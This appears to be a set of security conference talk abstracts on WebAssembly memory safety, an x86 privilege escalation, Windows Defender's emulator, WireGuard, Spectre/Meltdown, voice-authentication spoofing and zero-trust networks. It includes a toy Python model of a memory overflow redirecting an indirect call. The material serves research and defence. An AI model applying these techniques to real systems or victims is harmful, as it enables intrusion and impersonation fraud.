WebAssembly (WASM) is a new technology being developed by the major browser vendors through the W3C. A direct descendent of NaCl and Asm.js, the idea is to allow web developers to run native (e.g. C/C++) code in a web page at near-native performance. WASM is already widely supported in the latest versions of all major browsers, and new use case examples are constantly popping up in the wild. Notable examples include 3D model rendering, interface design, visual data processing, and video games. Beyond providing significant performance benefits to developers, WebAssembly is also touted as being exceptionally secure. Developers claim that buffer overflows will be an impossibility, as any attempted access to out-of-bounds memory will be caught by a Javascript error. Their documentation claims that control flow integrity is enforced implicitly and that "common mitigations such as data execution prevention (DEP) and stack smashing protection (SSP) are not needed by WebAssembly programs." However, the documentation also outlines several possible vectors of attacks, including race conditions, code reuse attacks, and side channel attacks.
The goal of this talk is to provide a basic introduction to WebAssembly and examine the actual security risks that a developer may take on by using it. We will cover the low-level semantics of WebAssembly, including the Javascript API, the linear memory model, and the use of tables as function pointers. We will cover several examples demonstrating the theoretical security implications of WASM, such as linear memory being shared between modules and the passing of a Javascript 'Number' to a WASM function that expects a signed integer. We will also cover Emscripten, which is currently the most popular WebAssembly compiler toolchain. Our assessment of Emscripten will include its implementation of compiler- and linker-level exploit mitigations as well as the internal hardening of its libc implementation, and how its augmentation of WASM introduces new attack vectors and methods of exploitation. As part of this, we will also provide practical examples of memory corruption exploits in the WASM environment that may lead to hijacking control flow or even executing arbitrary JavaScript within the context of the web page. Finally, we will provide a basic outline of best practices and security considerations for developers wishing to integrate WebAssembly into their product.
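To make the linear-memory concern concrete, here is a deliberately simplified Python model (not real WASM) of why an overflow that stays inside linear memory can still redirect an indirect call: function "pointers" compiled to WASM are just table indices stored in that same memory, and an indirect call only validates the type signature of whatever index it is handed. All names and offsets below are made up for illustration.

```python
# Conceptual model only: WASM linear memory as one flat byte array, with
# a C-style buffer and a stored function-table index living side by side.
# An overflow of the buffer never leaves linear memory (so no trap), but
# it rewrites the table index and redirects the later indirect call.

def benign():    return "expected behavior"
def gadget():    return "attacker-chosen function of the same signature"

table = [benign, gadget]          # the module's indirect-call table
memory = bytearray(64)            # linear memory
BUF, CALLBACK_IDX = 0, 16         # 16-byte buffer at 0, index at offset 16
memory[CALLBACK_IDX] = 0          # the program intends to call table[0]

attacker_input = b"A" * 16 + bytes([1])   # 17 bytes into a 16-byte buffer
memory[BUF:BUF + len(attacker_input)] = attacker_input   # stays in bounds

idx = memory[CALLBACK_IDX]        # indirect call: only the signature is checked
print(table[idx]())               # -> gadget(), not benign()
```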
There exists a "feature" in the x86 architecture that, due to improper programming by many operating system vendors, can be exploited to achieve local privilege escalation. At the time of discovery, this issue was present on the latest-and-greatest versions of Microsoft Windows, Apple's macOS, and certain distributions of Linux. This issue, very likely, impacts other operating systems on the x86 architecture.
For both Intel and AMD CPUs, this vulnerability can be utilized to reliably and successfully exploit Windows 10 by replacing the access token of the current process with the SYSTEM token from an unprivileged and sandboxed usermode application. This results in local privilege escalation. On AMD hardware, if SMAP/SMEP is disabled, this vulnerability can be exploited without failure since arbitrary user-specified memory can be utilized in CPL 0.
Windows Defender's mpengine.dll implements the core of Defender antivirus' functionality in an enormous ~11 MB, 45,000+ function DLL.
In this presentation, we'll look at Defender's emulator for analysis of potentially malicious Windows PE binaries on the endpoint. To the best of my knowledge, there has never been a conference talk or publication on reverse engineering the internals of any antivirus binary emulator before.
I'll cover a range of topics including emulator internals (bytecode to intermediate language lifting and execution; memory management; Windows API emulation; NT kernel emulation; file system and registry emulation; integration with Defender's antivirus features; the virtual environment; etc.), how I built custom tooling to assist in reverse engineering and attacking the emulator; tricks that malicious binaries can use to evade or subvert analysis; and attack surface within the emulator. I'll share code that I used to instrument Defender and IDA scripts that can be helpful in reverse engineering it.
The state of VPN protocols is not pretty, with popular options such as IPsec and OpenVPN being overwhelmingly complex, with large attack surfaces, using mostly cryptographic designs from the 90s. WireGuard presents a new abuse-resistant and high-performance alternative based on modern cryptography, with a focus on implementation and usability simplicity. It uses a 1-RTT handshake, based on NoiseIK, to provide perfect forward secrecy, identity hiding, and resistance to key-compromise impersonation attacks, among other important security properties, as well as high-performance transport using ChaCha20Poly1305. A novel IP-binding cookie MAC mechanism is used to protect against several forms of common denial-of-service attacks, both against the client and the server, improving greatly on those of DTLS and IKEv2. Key distribution is handled out-of-band with extremely short Curve25519 points, which can be passed around in the likes of OpenSSH. Discarding the academic layering perfection of IPsec, WireGuard introduces the idea of a "cryptokey routing table," alongside an extremely simple and fully defined timer-state mechanism, to allow for easy and minimal configuration; WireGuard is actually securely deployable in practical settings. In order to rival the performance of IPsec, WireGuard is implemented inside the Linux kernel, but unlike IPsec, it is implemented in less than 4,000 lines of code, making the implementation manageably auditable.
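To illustrate the "cryptokey routing table" idea with a conceptual sketch (not WireGuard's kernel code): each peer's public key is bound to a set of allowed IP prefixes, outgoing packets are encrypted to the peer whose prefix best matches the destination, and decrypted packets are accepted only if their inner source address maps back to the peer whose key authenticated them. The keys and ranges below are made up.

```python
# Conceptual cryptokey routing table: allowed-IP prefixes bound to peer
# public keys, resolved with longest-prefix matching.
import ipaddress

CRYPTOKEY_TABLE = [
    (ipaddress.ip_network("10.0.0.0/24"), "peer_pubkey_A"),
    (ipaddress.ip_network("10.0.0.8/32"), "peer_pubkey_B"),
    (ipaddress.ip_network("0.0.0.0/0"),   "peer_pubkey_gateway"),
]

def peer_for(ip: str) -> str:
    addr = ipaddress.ip_address(ip)
    matches = [(net, key) for net, key in CRYPTOKEY_TABLE if addr in net]
    return max(matches, key=lambda m: m[0].prefixlen)[1]   # longest prefix wins

# Outbound: encrypt to the peer owning the destination prefix.
assert peer_for("10.0.0.8") == "peer_pubkey_B"
assert peer_for("10.0.0.9") == "peer_pubkey_A"

# Inbound: after decryption, drop the packet unless its inner source IP
# routes back to the peer whose key authenticated it.
def accept_inbound(inner_src: str, authenticated_peer: str) -> bool:
    return peer_for(inner_src) == authenticated_peer
```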
2018 started off with a bang as the world was introduced to a new class of hardware vulnerability that became known as Meltdown and Spectre. New classes of vulnerabilities are exceedingly rare, and this one came with ramifications for the security boundaries that web browsers, operating systems, and cloud providers rely on for isolation to protect customer data. Now, rewind to the summer of 2017. This disclosure and the industry response were months in the making. A new class of vulnerability comes with challenges rarely faced and the need to step back and examine our thinking.
In this presentation, we will describe Microsoft's approach to researching and mitigating speculative execution side channel vulnerabilities. This approach involved bringing together experts from across Microsoft, hiring an industry expert to accelerate our understanding of the issues, and collaborating across the industry in a way not done previously. This joint presentation between Microsoft and G DATA will provide a firsthand account of the engineering-centric work done and the collaboration necessary to mitigate these issues. We will describe the taxonomy and framework we created, which provided the industry foundation for reasoning about this new vulnerability class. This work built on the initial researcher reports and expanded into a larger understanding of the issues. Using this foundation, we will describe the mitigations that Microsoft developed and the impact they have on Spectre and Meltdown.
Financial institutions, home automation products, and hi-tech offices have increasingly used voice fingerprinting as a method for authentication. Recent advances in machine learning have shown that text-to-speech systems can generate synthetic, high-quality audio of subjects using recordings of their speech. Are current audio generation techniques good enough to spoof voice authentication algorithms? We demonstrate, using freely available machine learning models and a limited budget, that standard speaker recognition and voice authentication systems are indeed fooled by targeted text-to-speech attacks. We further show a method that reduces the data required to perform such an attack, demonstrating that more people are at risk of voice impersonation than previously thought.
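For orientation, here is a hedged sketch of the verification step such systems typically rely on: a fixed-length speaker embedding is extracted from each utterance (the embedding model itself is out of scope here), and access is granted when the cosine similarity to the enrolled embedding clears a threshold -- which is exactly the score a good synthetic utterance can also clear. The threshold and the random "embeddings" are placeholders.

```python
# Sketch of threshold-based speaker verification on embedding vectors.
# How embeddings are produced, and the 0.75 threshold, are assumptions;
# the point is that any audio scoring above the threshold is accepted,
# whether a human or a text-to-speech model produced it.
import numpy as np

THRESHOLD = 0.75   # placeholder decision threshold

def cosine(a: np.ndarray, b: np.ndarray) -> float:
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b)))

def verify(enrolled: np.ndarray, attempt: np.ndarray) -> bool:
    return cosine(enrolled, attempt) >= THRESHOLD

rng = np.random.default_rng(0)
enrolled = rng.normal(size=256)                       # victim's voiceprint
synthetic = enrolled + 0.2 * rng.normal(size=256)     # "close enough" TTS audio
print(verify(enrolled, synthetic))                    # True -> access granted
```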
Over the last year, the "zero trust" network (ZTN) security architecture concept has generated interest both for its abstract security properties, and the marketing hoopla proclaiming it the "next big thing." The value proposition of "zero trust" networking is that it can more effectively prevent common security issues that lead to breaches while simultaneously enabling BYOD and removing the need for VPNs and legacy security concepts. ZTN architectures claim to enable both enhanced security and user freedom by removing implied trust from the network perimeter and replacing it measured trust at the user and device layers. This success of this scheme relies heavily on the ability to measure user and device security properties as a viable means to establish trust.
In this talk, we will analyze the "zero trust" approach in several threat scenarios to determine its true effectiveness. This will include an examination of the platform and device security properties that can be measured to establish trust across modern OSs such as Windows, Chrome OS, iOS, and Android. This will incorporate a detailed technical dive into the capabilities and limitations of device trust measurement frameworks such as Google's SafetyNet/Verified Access, Microsoft's System Guard Runtime, and common EDR/AV products. ZTN based methods for combining device and identity-based to provide access and authorization will also be examined.
Finally, public ZTN implementations will compared to a wide range of threats from common REDTEAM tradecraft all the way though hardware and firmware attacks. Attendees will walk away from the talk with a technically sound view on the potential and pitfalls of ZTN based networks, which will help to cut through the marketing hype.